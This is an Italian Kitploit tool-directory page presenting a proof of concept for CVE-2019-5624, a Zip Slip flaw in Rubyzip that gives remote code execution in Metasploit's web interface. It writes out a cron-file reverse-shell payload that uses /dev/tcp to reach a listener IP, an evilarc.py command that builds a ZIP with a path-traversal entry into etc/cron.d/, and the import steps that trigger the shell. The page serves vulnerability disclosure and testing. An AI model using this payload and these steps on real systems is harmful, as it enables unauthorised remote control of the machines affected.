Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-5624 — Una prova di concetto per la vulnerabilità CVE-2019-5624 di Metasploit (RCE tramite gestione non sicura dei file ZIP di Rubyzip) | Kitploit
Strumenti/GitHubGitHub/voidsec/cve-2019-5624
Framework di ExploitAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubvoidsec/cve-2019-5624

CVE-2019-5624

Una prova di concetto per la vulnerabilità CVE-2019-5624 di Metasploit (RCE tramite gestione non sicura dei file ZIP di Rubyzip)

Vedi Repository
13537 anni faNon ancora revisionato
Sito web

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-5624

Una prova di concetto per la vulnerabilità CVE-2019-5624 di Metasploit (RCE tramite gestione non sicura dei file ZIP in Rubyzip)

Introduzione

Nel febbraio 2019 ho trovato una nuova vulnerabilità nella libreria Rubyzip. Consente a un attaccante di sfruttare una gestione non sicura dei file ZIP (Zip Slip) che porta all'esecuzione remota di comandi.

Questa vulnerabilità è stata sfruttata per colpire tutte le versioni di Metasploit < 5.0.18 Metasploit Wrap-Up

Ho scritto un dettagliato post sul blog che spiega la vulnerabilità.

POC

  • Crea un file con il seguente contenuto:
root@kitploit:~
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
  • Genera l'archivio ZIP con il payload di path traversal:
root@kitploit:~
python evilarc.py exploit --os unix -p etc/cron.d/
  • Aggiungi un workspace MSF valido al file ZIP (in modo che MSF lo estragga, altrimenti rifiuterà di elaborare l'archivio ZIP)
  • Configura due listener, uno sulla porta 4444 e l'altro sulla porta 4445 (quello sulla porta 4445 riceverà la reverse shell)
  • Accedi all'interfaccia web di MSF
  • Crea un nuovo “Progetto”
  • Seleziona “Importa”, “Da file”, scegli il file ZIP malevolo e infine clicca sul pulsante “Importa”
  • Attendi il completamento del processo di importazione
  • Goditi la tua reverse shell
  • Video

    Scarica lo strumento